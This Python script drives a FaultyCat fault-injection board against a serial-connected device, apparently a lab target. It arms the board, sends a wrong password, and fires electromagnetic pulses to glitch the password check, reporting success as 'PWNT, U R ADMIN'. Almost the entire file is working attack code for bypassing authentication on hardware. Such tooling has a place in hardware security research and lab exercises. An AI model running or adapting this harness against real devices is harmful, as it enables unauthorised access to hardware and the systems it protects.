import sys
import time
import pexpect # Required to handle screen sessions
import threading
from Modules import Worker
DEFAULT_COMPORT = "/dev/ttyACM0"
SCREEN_NAME = "ttyUSB0_screen" # Replace this with the actual screen session name
# Initialize the FaultyWorker
faulty_worker = Worker.FaultyWorker()
# Shared variable to store the response from the device
device_response = None
child = None # Global child variable
def initialize_child():
"""Initialize the global child process for the screen session."""
global child
child = pexpect.spawn(f'screen -x {SCREEN_NAME}', encoding='utf-8')
child.expect(pexpect.TIMEOUT, timeout=1) # Clear out any pre-existing buffer
def send_test_message_and_read_response():
"""Send 'ping' via screen to a serial device and check for 'correct!\\n' or 'incorrect\\n'."""
global child
# Send 'ping' to the screen session
child.sendline("ping")
sys.stdout.write("\rSent 'ping' to screen session.")
sys.stdout.flush()
# Wait a bit to ensure the command is processed
time.sleep(0.5)
# Try reading any new output from the screen session
try:
response = child.read_nonblocking(size=1024, timeout=2) # Read up to 1024 bytes of new data
if "pong" in response:
sys.stdout.write("\rReceived 'pong' response.")
return True
else:
sys.stdout.write(f"\rReceived unexpected response: {response}")
sys.stdout.flush()
except pexpect.exceptions.TIMEOUT:
sys.stdout.write("\rNo response received from the screen session (timeout).")
sys.stdout.flush()
return False
def read_screen_output():
"""Read output from the screen session in a separate thread."""
global device_response
buffer = "" # Initialize a buffer to store incoming characters
try:
while True:
response = child.read_nonblocking(size=1024, timeout=2) # Read up to 1024 bytes of new data
buffer += response # Append the new response to the buffer
# Check if there's a complete line in the buffer
while "\n" in buffer:
line, buffer = buffer.split("\n", 1) # Split the buffer at the first newline
line = line.strip() # Remove any leading/trailing whitespace
# Check for specific responses
if "incorrect!" in line:
#sys.stdout.write("\rReceived 'incorrect' response.")
device_response = 'incorrect'
return # Exit the loop on incorrect response
elif "correct" in line:
# Die here: Echo message, disarm device, and kill the program
sys.stdout.write("\nReceived 'correct' response.\n PWNT, U R ADMIN\n Disarming the device and exiting...\n")
sys.stdout.flush()
# Disarm the board
faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
faulty_worker.board_uart.close()
# Exit the program
sys.exit(0)
else:
sys.stdout.write(f"\rReceived unexpected response: {line}")
sys.stdout.flush()
except pexpect.exceptions.TIMEOUT:
sys.stdout.write("\rNo response received from the screen session (timeout).")
sys.stdout.flush()
except Exception as e:
sys.stdout.write(f"\rError reading from screen session: {e}")
sys.stdout.flush()
def send_pulse_and_check_response():
"""Send a pulse and check for 'correct!\\n' or 'incorrect\\n' response in parallel."""
global device_response
try:
# Wait a bit to ensure the command is processed
# Send 'incorrectPassword' command to the screen session
sys.stdout.write("\rSending 'incorrectPassword' to screen session.")
sys.stdout.flush()
child.sendline("incorrectPassword")
time.sleep(0.35)
# Send 'pulse' command (simulating the pulse trigger)
faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_PULSE.value.encode("utf-8"))
sys.stdout.write("\rSent pulse...")
sys.stdout.flush()
# Start a thread to read the screen output
reader_thread = threading.Thread(target=read_screen_output)
reader_thread.start()
# Wait for the reading thread to complete
reader_thread.join()
except Exception as e:
sys.stdout.write(f"\rError interacting with screen session during pulse: {e}")
sys.stdout.flush()
return False
def start_faulty_attack():
"""Send a pulse through the FaultyCat and listen for the response concurrently."""
global child
try:
# Initialize the child process for screen session
initialize_child()
# Open FaultyCat connection
faulty_worker.board_uart.open()
time.sleep(0.1)
sys.stdout.write("\rBoard connected.\n")
sys.stdout.flush()
# Arming the board
sys.stdout.write("\r[*] ARMING BOARD, BE CAREFUL!\n")
sys.stdout.flush()
faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
time.sleep(1)
faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_ARM.value.encode("utf-8"))
sys.stdout.write("\r[*] ARMED BOARD.\n")
sys.stdout.flush()
time.sleep(1)
# Sending pulses and checking responses in a loop (up to 5 times)
max_iterations = 5
for i in range(max_iterations):
sys.stdout.write(f"\rLoop {i+1}/{max_iterations}: Sending pulse and checking response.\n")
sys.stdout.flush()
# Send the test message and check for pong
if send_test_message_and_read_response():
max_iterations_2 = 3
for j in range(max_iterations_2):
# Send pulse and check for correct/incorrect response
if send_pulse_and_check_response():
break # Break the loop if 'correct!' is received
# Small delay before next iteration
time.sleep(1)
# Disarm the board
sys.stdout.write("\rDISARMING BOARD. \n")
sys.stdout.flush()
faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
faulty_worker.board_uart.close()
sys.stdout.write("\rBOARD DISARMED.\n")
sys.stdout.flush()
except Exception as e:
sys.stdout.write(f"\rError: {e}\n")
sys.stdout.flush()
finally:
# Make sure to clean up the child process
if child:
child.close()
def faulty():
"""Configure and send pulses through the FaultyCat."""
comport = DEFAULT_COMPORT
print("Configuring the FaultyCat...")
print(f"Using serial port: {comport}")
# Set the serial port
faulty_worker.set_serial_port(comport)
# Validate the serial connection
if not faulty_worker.validate_serial_connection():
print(f"Error: Could not establish connection on: {comport}")
return
# Start the faulty attack (send pulse)
start_faulty_attack()
if __name__ == "__main__":
print("Starting FaultyCat...")
faulty()